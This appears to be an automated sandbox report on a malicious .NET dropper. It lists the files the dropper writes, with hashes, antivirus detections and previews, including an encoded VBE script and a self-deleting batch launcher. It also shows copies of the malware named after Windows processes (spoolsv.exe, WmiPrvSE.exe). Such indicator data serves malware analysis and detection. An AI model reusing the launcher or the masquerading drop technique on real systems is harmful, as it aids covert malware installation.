Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (332), with no line terminators
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.837383316532271
Encrypted:	false
SSDEEP:	6:z5NcTSgzphQD8CuK3GE4+ghW0N0uh44WIorcqRYD1TsxGOT3fhCqLTt:x+QQK3GZ7Wz49orcqR8CZbfnTt
MD5:	AE0E2D05F9F27132F16F01E586073DD8
SHA1:	C86400A07155DC670952176150B5974B559F6558
SHA-256:	68A84850E9B2F2361DAFA1E3A7D493EF49D975EC78F11EA3F355AA6BF07765DC
SHA-512:	BB51D0C76453AF8133218930407EE78949F7DE692A6CAC3D8634E12132F1D3A380FDDBF16B56637E6C53B0C84C8E74ACA1AF81BEFFF029F5913368F6E7CCB814
Malicious:	false
Preview:	KSUdgZKlB0yCzID1SjgovC2uRhLyCoqyv7k2Faxb9sdsdCUD7Vc4PpiHakM9NVjXKAQ1iKv2wFpDiJRONI1qLwiGZccfNxNnIGicvcfwjkHKAfiRS7wFe3LYbKcFsPo81B4ckydvnFGloXG34LMQBIJP4JBl9ZET5IS8kGqeeBcYwkuDDjLhDY6t2phbx2vNBwpfFHSxeswAqucUZ7haOgQhMjG5iOrmPOX94O85QXCVm6CHMNBzUV8egITfBWPQAJvbWdaK9mJ1e54Ph8tVM2R4P3cv5d33IwUcLkvsw1zsLH9kND8Dn3DI20MdAoPgsPtslcE6NAiV

C:\Recovery\f8c8f1285d826b

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (722), with no line terminators
Category:	dropped
Size (bytes):	722
Entropy (8bit):	5.871063185154126
Encrypted:	false
SSDEEP:	12:0TxskmsmBSxNGkAAM2lub6HeQALsOV+jQ/19FiWj7IjylcHw18AJ6c6qTVX1Bj9s:aFmsmBSbG/WHnALLzFiWge6QDr6otR2H
MD5:	BA3F089F2548C4953C7A0C23CC1D32A1
SHA1:	91379721BC1332B613944B9922A1C857B5B593BC
SHA-256:	2DB5B2F241F8BD41A9ED24A6DAFAC8FA310C314C50B6B8164F985EB7C3AFFECD
SHA-512:	FE132339DA60ABFD8A6A2282FD327D2E741AC19B48FB3D64375BE5D2CD0A27138FB047F615272280B1C10ED13E9EC0589415C2C23A2E61F2FF06DCCEFCE12F98
Malicious:	false
Preview:	TDETN0nTBK4p9z5ycVIOxoMoQDW6Zwu1eQQ2oCdmAcTRndVd4a9MhP5o0ZCKdq4PaDKsiDJa2gOVV5Bwr3C8whUOVmBO9TIThD0jSn41RjUBAjT4YPcko6c2s6W6C4aiX5xREbdE8KqNNSNwSG0t0ioll81WQ7zXIvnFvB06vXldPOoaskn5DqryQMqGkHyBVTFcoIARQ38c7KWWUbopU3TbDzyjUtWojjH5JMvjkVoJsO0G0UwJcIqc9nYzTb7ggT3XCaMHqEE8PJty8ssA7NMa3p6gx5QJYHnYVcDaIodXEsMz3k1ks6iTHceXepUuy5jHgVcfpS1TuyWKcGnMEpbciTQ28q6cTsjJJFTiHV5ZEOjSGT4YCIqIdHiNEjh8WZABPNBXwEEtuBXTu8wowhZLCapBhGdhx6DpOhD2Shl7D7XcuOcGx3My9z9yi90qkh5x7rFN43VP6cHECMRSnXu3uPpYhOUSq5WgBkeCIPL3h72hr4vVshCNwCDsBrqpjDiBFlDcsPJYL1VwXIqmd9kJ2Ju9gwAbifTeZ0bG1SndXoB4qRV3ADMjdYJ51E65Oszpi0XgqkvKWGvOHzSPaHbfTuBArgOwWrOpyVWz4yMaSCNWn4yBvreHRUWxzWyKV8xp1FZwddUl4BNQhpXwrMBpMHYe8iAhACETOhehfBiSW2MQHGQJ9BcJ7Icur5x4dxl163C9LzRposST5I

C:\Users\Default\Documents\24dbde2999530e

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	106
Entropy (8bit):	5.442279596310034
Encrypted:	false
SSDEEP:	3:R7wgdSVj1cyfewv0kvN5NGACLyMo:Rcgdo1Ffew8kVPGAl
MD5:	CC85F6337BF85FFB3FA3AA1481ABFEEB
SHA1:	7C523B14CA12C8B6D1A35191D79CEDCACF0204C2
SHA-256:	DA7DADBB79C5C833CD242EE6B59EBAB474EA61FA4C7470432C877FC56A2E3CEB
SHA-512:	E7A7940A545F9BF2DD97B1533CB2BA7E7B3BE2400A3315440149B06C34B41C633B532BA1B7D3CCE9CD0B284360CE00782799FFA59B45E3C8ED2BA33242BCC76E
Malicious:	false
Preview:	pQGmbeLfOyN4zUGGJW2kQZAETkB4swk3Vj7oxZVukrPlPwXVOreAznzPQBT0cQxcOUjPXbTtAHAiKYyhNqqASkDsurYvGeST4xX5NH7wYu

C:\Users\Default\Documents\WmiPrvSE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\f3b6ecef712a24

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (657), with no line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.862801429849006
Encrypted:	false
SSDEEP:	12:8QvrEdUE9J0Xe8jAqRq+tBO60LWjADCCbR9VdIqG5BR7Rmx0ZhUIl0sfpU:8QvYdV0OKI8octCd9VxG3vLZh5T+
MD5:	B0B9F6DF6AA0BA8BF661A7C54FD92A19
SHA1:	16D05F3A8F2082DE4F54F918538A57080C88D362
SHA-256:	267D5626E3BAC15E017A83B93D983B81D9A83B46929928CD7FEC64DFE012645C
SHA-512:	A30D77BFB3630EB4432099BA0A706C1E7D9C43583FAA57D384125086033BBB4703AC3A76C46B6C6BACBB223EEB3AADFB8A58A261B0E34EF354D22AF8B5B6100C
Malicious:	false
Preview:	20cP6kkqAbbiF0NSgn4BplFlR7jIa5ayGtZa6ViNbZVzHEvN2V9VTO9Qv078AbQEAnbVaxVKFqjQPQeNLWQF6Ee2uIpGXjNAJRyemZwF9yQnosBeWtwnLKI6IjlSIPxfdjH8c9lwkLFHy0OBHKunwjz8J2VCye6tBuJElCCWIAD9FAHSVjK7fJt4uJyjni7FOWFDrJZEHXfvfz3IuDrOT9N2BPUcNcskD7vs5EkMJFzIo7Y5Pqzk0swOIMCcz60oo5shDKMqcfFNJFOD0ZMhnItULhksBIXMOKdtP11FdIHVniFC88lZuTAgLXVgjeoUI298lfy8hHDfAXrnbhuDg7c5J7h1fVf9dxNvjGacJn2mPffyqsEBtlxLZDyn87cLlECNK5EVGR33E0poctLxRdP29BWfRxeMKrALdRnuos4cr3HiXKLOwp3HzJNIjiDTwrtWzeLLFaIjjwKG4xHHlQaey3WTDeLGpkqAKut389IVgUiC8HOva5rgQPh6I1HlPC48GK6JEOJlHE7eUTU6QZpt3Jt5MxuG2hGdak5yLErMwFZLRDlygLUzXLF7bB6RdCtj8eEuXgvMsd6xuhnJL5krNRGPf8XKHasuWzNx91aAZIH4OSN3XxFhcBWqXzPZJlFRvLa4T0JUfjRFJ

C:\Users\Public\Desktop\spoolsv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe.log

Download File

Process:	C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containerdll.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spoolsv.exe.log

Download File

Process:	C:\Users\Public\Desktop\spoolsv.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe

Download File

Process:	C:\Users\user\Desktop\5U9CuGu1ru.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs

Download File

Process:	C:\Users\user\Desktop\5U9CuGu1ru.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.124083797069061
Encrypted:	false
SSDEEP:	3:LlzRWDNMSdn:PWbn
MD5:	677CC4360477C72CB0CE00406A949C61
SHA1:	B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
SHA-256:	F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
SHA-512:	7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
Malicious:	false
Preview:	MsgBox "TestDefault, Message!", 64

C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe

Download File

Process:	C:\Users\user\Desktop\5U9CuGu1ru.exe
File Type:	data
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.846578170013664
Encrypted:	false
SSDEEP:	6:G3wqK+NkLzWbHhE18nZNDd3RL1wQJRQrRr1E3dY4Wf1:G+MCzWLy14d3XBJ2r1CYR
MD5:	24D6887613762DB9ACD22313EF674B81
SHA1:	D50168D7E5EA884E0761431B42FBFEAB6BA0791E
SHA-256:	4D61671EC0E16D5FDE2A7B0C2C0C3ECEE2597E90B782A7CC248DD657A0B8920F
SHA-512:	62C419FE9BCC6807CA038D2EC2AD7C6D76FDB9851BB2C9B36B73CA429292C6E97441ECFBB81E6A88FC893E721E9922095BE8048A875F9D18295B3372B71B46C3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uz&xYKN4^wJyj+.lTU$s%G{o:2bx)a?RV~}AR8CDJSPZSP6lsd.iTsAAA==^#~@.

C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat

Download File

Process:	C:\Users\user\Desktop\5U9CuGu1ru.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.182907326480826
Encrypted:	false
SSDEEP:	3:5IvL7TJv0XBL4i:5ITft04i
MD5:	8A76133B1B6BFD366BBD35FB1D2D8B95
SHA1:	A3732BF75C0528DA46D1FDDEA1D549743CE9C6F4
SHA-256:	9CD8FA02B6CC3C89A404060C058EFB97BCB8F606EF895ABBA9E04FAAE7880F7A
SHA-512:	50D86F78C8EE9E45A19E1204FF102AD5660AD7FF786C34792FC0D21560186C27F67D83E867A4F23ABDC80303FF8986BD6C8BC9A4964FE15A26FDAB742346CFE7
Malicious:	false
Preview:	"%Temp%\Intodhcp\containerdll.exe"

C:\Users\user\AppData\Local\Temp\kUv3Ev2rOr

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:cmt0kyGF/Ryn:XGkL8n
MD5:	8C2E49A358624FED5FDA52917DC182BA
SHA1:	853EEF6342A58AC3C0A5B7BD4B64803C44164D46
SHA-256:	204D0B1309A776C80E18C3F7AF62ECA6B7A5657616408EC5FEFC9440BD8960B2
SHA-512:	41318E20ED88E697F1C9CE34F5B35DEE0E00607179FBC8444AE6FF644EDFD9610F4062D96500BB01947B4561159AE4A812D8D298B7B87304926EAA870EAD0982
Malicious:	false
Preview:	3aeCTNQAFmn5oKTzvRvVt6RVW

C:\Users\user\AppData\Local\Temp\kVQjSoqMfO.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	212
Entropy (8bit):	5.294267426448979
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DE7KVzupxdiKOZG1923f/Thn:OTg9YDE7ozupcXThn
MD5:	1926F1233CA448D4554CDE9AA8D72737
SHA1:	D4760C0BE375A0DE0E78E046DAB16CE97672F56B
SHA-256:	985B247982AD04CC01ECFEAACD0FC3FBA56B97F1FD9A06438BB38D51D780DED3
SHA-512:	F0285CF116D6772F8E3EFCD53811D822F17A9893852355BAF1560B35D272FE5A8F65CDED186A43EB721B14F53615A809EE9C523A57624681C897C4707EA0EB24
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\kVQjSoqMfO.bat"

C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........".. ....#...@.. ........................#...........@.................................p.".K....@#......................`#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../....#..0....".............@....rsrc........@#.......#.............@..@.reloc.......`#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Downloaded Program Files\b7ad5a7a0bb6c8

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	ASCII text, with very long lines (825), with no line terminators
Category:	dropped
Size (bytes):	825
Entropy (8bit):	5.886087096289368
Encrypted:	false
SSDEEP:	12:k188bigEZWmd9fTioHcCDNppoGFPYCixWo4a2hdk62CyyptMWlBKmytgK:Q5paddYC/OFZWSWk6rMqKT1
MD5:	A5068A9EA8176A488FAF386F4693F9FE
SHA1:	3B6D82D5E7EB81756DC6990C5DEAA91D03ED3C90
SHA-256:	A1D42E82B36AD974B1740B9BFB5EA3484691AB073208B365D23EBB2EA90B8219
SHA-512:	74F31CFDE382669EE52A524EFA943DE3DF7AE6ECB16EEB426CA0498D0CC65BA8F621766212B98B615E4D4D0B3EBC2727734B97616173C3EFF58B724DB7AC5B55
Malicious:	false
Preview:	jRUTOER8JuweO0Jzji5nmOmRBg64b9rbA3tCkzJy92YOxaHP55RBTAMUoDRrHXhKCVeUGGOuZGnu0YelYq8fsqIArZYhhbqmUOLc6xIzqhmMWcePiqSaZBcWMdnrsrM7aBZlMColhJzLD6nP4I80JQNTvzPcKbG8UowVC2DfBq2QLRSQzXwktVyKyF0XwMbGC10ZJSMCFczcX6Ieg8mwogP80mh6CqszPwNUa3GhLueQgVw17V0yjpbfm1ihuQ9ZuANlsxDn2Fl3B8bfzq8rz4PkUsriVix4vFggILIJRN5eDienZDsERSjzumRAGfRTSqI5c5WohzZm9ugvODIR0sncgrvf4IDw5mMXZiLeqEgb3609FfwCW9cjCpZvJ0tZvnrXiJWp2olwLLjj1vZZVAZ5JnUuJaU0UHqPPdb6JGKsYqX1Gz3XaUDuNvN5ylgbTucEfTUYUdQO0rgcPdnTg6Z9D5CdPgIhjsYnOTVwefD7Ey3fPvqU8N5XVcAjR0IyVspIT2O5I1yA3c4PBgOd0xjWxBSvSvfnXPmVJvMWguMGY4e3hviumo8hJSVRkcmWWKnnziFPT26Fkc82hZNhNuBsREM1a5wEH0uNR0D9qSbur27rTcuKOFJmJ5WuWNzYG28tsvlrVO14TRAYHeh7KlzCrHDVdSmccCnz4N8i1DyANOT157n2p1NeC6CkrPNDmZbQnKe3g9FHwzycyLagpuwkzIw8KX0l0vXywCOuctVqwFsNHjwfzqY2m0beXgsIIdRAb9qv7pD5YFytaj0llVwJXfM5ltX5ANhSysvI3AhKncegBrEyqHgxr

C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2295296
Entropy (8bit):	7.578559036061074
Encrypted:	false
SSDEEP:	49152:H7QaWHNEdfPmj9QJlNUm90sm+etJbzkdQKic:U9GfP+WDNl8+azkN
MD5:	28DD5F145AEB9F6E3D1C60BC1DE330B6
SHA1:	DCA74B95C8D198AAB1A8857E869D5BFEB37C1C8A
SHA-256:	81DB2C4B9C987EA894DF16DACFC5996DC8AFEC6D276645081FC6D094E71BF8B5
SHA-512:	DB608610A3405ED00F5437D8C9140D87E5ED35DB70BCA6BC90129D4D000078599E8FEB2F7B173F9EF2642A749B796E137A0F6DD525D930D9665CAC1429987313
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
